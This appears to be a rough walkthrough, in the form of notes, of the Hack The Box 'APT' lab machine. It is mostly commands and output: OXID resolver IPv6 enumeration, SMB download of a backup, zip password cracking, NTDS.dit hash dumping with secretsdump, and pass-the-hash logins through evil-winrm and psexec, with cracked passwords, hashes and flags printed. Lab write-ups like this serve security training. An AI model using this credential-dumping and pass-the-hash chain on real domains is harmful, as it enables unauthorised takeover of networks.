.
i used https://github.com/puckiestyle/python/blob/master/IOXIDresolver.py
reference used :
The OXID Resolver [Part 1] – Remote enumeration of network interfaces without any authentication
┌─[root@parrot-virtual]─[/home/user/htb]
└──╼ #python3 IOXIDresolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::8d29:507a:2edb:a06e
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u roastsvc -p ‘!!!watermelon245’
└──╼
$nmap -6 -sV dead:beef::b885:d62a:d679:573f Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 14:52 GMT Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 9.09% done; ETC: 14:54 (0:01:00 remaining) Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 90.91% done; ETC: 14:55 (0:00:11 remaining) Nmap scan report for dead:beef::b885:d62a:d679:573f Host is up (0.026s latency). Not shown: 989 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-12-04 14:53:07Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=12/4%Time=5FCA4D54%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 149.32 seconds
.
evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p ‘G1#Ny5@2dvht’
1) get IPV6
2) smbclient connect to it and get backup.zip
3) crack zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dlt
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt
┌─[✗]─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-smbclient htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# shares
backup
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 .
drw-rw-rw- 0 Thu Sep 24 08:31:03 2020 ..
-rw-rw-rw- 10650961 Thu Sep 24 08:31:03 2020 backup.zip
# get backup.zip
┌─[puck@parrot-lt]─[~/htb/apt]
└──╼ $impacket-lookupsid htb.local/henry.vinson_adm:G1#Ny5@2dvht@htb.local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Brute forcing SIDs at htb.local
[*] StringBinding ncacn_np:htb.local[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2993095098-2100462451-206186470
498: HTB\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: HTB\Administrator (SidTypeUser)
501: HTB\Guest (SidTypeUser)
502: HTB\krbtgt (SidTypeUser)
503: HTB\DefaultAccount (SidTypeUser)
512: HTB\Domain Admins (SidTypeGroup)
513: HTB\Domain Users (SidTypeGroup)
514: HTB\Domain Guests (SidTypeGroup)
515: HTB\Domain Computers (SidTypeGroup)
516: HTB\Domain Controllers (SidTypeGroup)
517: HTB\Cert Publishers (SidTypeAlias)
518: HTB\Schema Admins (SidTypeGroup)
519: HTB\Enterprise Admins (SidTypeGroup)
520: HTB\Group Policy Creator Owners (SidTypeGroup)
521: HTB\Read-only Domain Controllers (SidTypeGroup)
522: HTB\Cloneable Domain Controllers (SidTypeGroup)
525: HTB\Protected Users (SidTypeGroup)
526: HTB\Key Admins (SidTypeGroup)
527: HTB\Enterprise Key Admins (SidTypeGroup)
553: HTB\RAS and IAS Servers (SidTypeAlias)
571: HTB\Allowed RODC Password Replication Group (SidTypeAlias)
572: HTB\Denied RODC Password Replication Group (SidTypeAlias)
1001: HTB\APT$ (SidTypeUser)
1102: HTB\DnsAdmins (SidTypeAlias)
1103: HTB\DnsUpdateProxy (SidTypeGroup)
1104: HTB\apt-Admins (SidTypeAlias)
1105: HTB\henry.vinson (SidTypeUser)
1106: HTB\henry.vinson_adm (SidTypeUser)
┌─[user@parrot-virtual]─[~/htb/apt]
.
┌─[user@parrot-virtual]─[~/htb/apt] └──╼ $zip2john backup.zip > encrypted.hash$ backup.zip/Active Directory/ is not encrypted! ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time. ┌─[user@parrot-virtual]─[~/htb/apt]
┌─[✗]─[user@parrot-virtual]─[~/htb/apt]
└──╼ $john encrypted.hash\$ --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch (backup.zip)
1g 0:00:00:00 DONE (2021-01-26 09:37) 20.00g/s 163840p/s 163840c/s 163840C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
--snip--
prue.olson:aes256-cts-hmac-sha1-96:cd0d76863148d8ad87c40bd1903a6af2295db46ce3e9494d1f8b95de99b91a64
prue.olson:aes128-cts-hmac-sha1-96:d817cf2341be47674e6d0dccab1237b0
prue.olson:des-cbc-md5:2c5dba54314c20ba
[*] ClearText password from ntds.dit
APT$:CLEARTEXT:4[%fo'zG`&BhR3cP[)U2NVS\LEYO/&^)<9xj6%#9\\?uJ4YPb`DRK" IES2fXK"f,X(Ql*fg0RfRq=!,BeAVFt^EVRR-L)VaTjv/QG9=o;G@g>Vab-UYc Yd
[*] Cleaning up...
┌─[user@parrot-virtual]─[~/htb/apt]
.
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $python3 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL > result.txt
┌─[user@parrot-virtual]─[~/htb/apt]
└──╼ $cat result.txt | grep henry
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
livy.henry:3900:aad3b435b51404eeaad3b435b51404ee:5c0f4f9540cad94bb2554c8684d9ea66:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
livy.henry:aes256-cts-hmac-sha1-96:8f0397da6b26addc0536c294a788b919dd980afb738e3a9c233afcfc90fba5b0
livy.henry:aes128-cts-hmac-sha1-96:b719dae2156cd496995db190411d319e
livy.henry:des-cbc-md5:1043cb0bce31c49e
┌─[user@parrot-virtual]─[~/htb/apt]
evil-winrm -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2
thus
1st add ipv6 ip to etc/hosts !!!!! dead:beef::b885:d62a:d679:573f apt.htb htb.local
2nd
┌─[user@parrot-virtual]─[/opt/evil-winrm] └──╼ $sudo ruby evil-winrm.rb -i htb.local -u henry.vinson_adm Enter Password:G1#Ny5@2dvh Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls Directory: C:\Users\henry.vinson_adm\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 1/25/2021 11:53 AM 12674 Powerless.bat *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> download Powerless.bat Info: Downloading C:\Users\henry.vinson_adm\Documents\Powerless.bat to Powerless.bat Info: Download successful! *Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>
3th
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm] └──╼ $ruby evil-winrm.rb -i dead:beef::b885:d62a:d679:573f -u Administrator -H c370bddf384a691d811ff3495e8a72e2 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint Error: An error of type URI::InvalidURIError happened, message is bad URI(is not URI?): "http://dead:beef::b885:d62a:d679:573f:5985/wsman" Error: Exiting with code 1
┌─[✗]─[user@parrot-virtual]─[/opt/evil-winrm] └──╼ $ruby evil-winrm.rb -i htb.local -u Administrator -H c370bddf384a691d811ff3495e8a72e2 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> net users User accounts for \\ ------------------------------------------------------------------------------- Administrator DefaultAccount Guest henry.vinson henry.vinson_adm krbtgt The command completed with one or more errors. *Evil-WinRM* PS C:\Users\Administrator\Documents> dir *Evil-WinRM* PS C:\Users\Administrator\Documents> cd .. *Evil-WinRM* PS C:\Users\Administrator> dir Directory: C:\Users\Administrator Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 9/24/2020 9:12 AM Contacts d-r--- 10/23/2020 10:59 AM Desktop d-r--- 9/24/2020 9:12 AM Documents d-r--- 9/24/2020 9:12 AM Downloads d-r--- 9/24/2020 9:12 AM Favorites d-r--- 9/24/2020 9:12 AM Links d-r--- 9/24/2020 9:12 AM Music d-r--- 9/24/2020 9:12 AM Pictures d-r--- 9/24/2020 9:12 AM Saved Games d-r--- 9/24/2020 9:12 AM Searches d-r--- 9/24/2020 9:12 AM Videos *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 12/4/2020 1:22 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 0ca97e04be5679529b87cc2a2de98782 *Evil-WinRM* PS C:\Users\Administrator\Desktop> cd .. *Evil-WinRM* PS C:\Users\Administrator> cd .. *Evil-WinRM* PS C:\Users\> dir Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/24/2020 7:54 AM Administrator d----- 9/24/2020 8:39 AM henry.vinson d----- 9/24/2020 8:40 AM henry.vinson_adm d-r--- 11/21/2016 2:39 AM Public *Evil-WinRM* PS C:\Users> cd henry.vinson_adm *Evil-WinRM* PS C:\Users\henry.vinson_adm> cd desktop *Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop> type user.txt e1e73b8410cf060794a86e7f6a753f83 *Evil-WinRM* PS C:\Users\henry.vinson_adm\desktop>
E:\PENTEST>psexec_windows.exe -hashes c370bddf384a691d811ff3495e8a72e2:c370bddf384a691d811ff3495e8a72e2 administrator@htb.local Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on apt.htb..... [-] share 'backup' is not writable. [*] Found writable share NETLOGON [*] Uploading file RJdJAMfb.exe [*] Opening SVCManager on apt.htb..... [*] Creating service kOFV on apt.htb..... [*] Starting service kOFV.....
.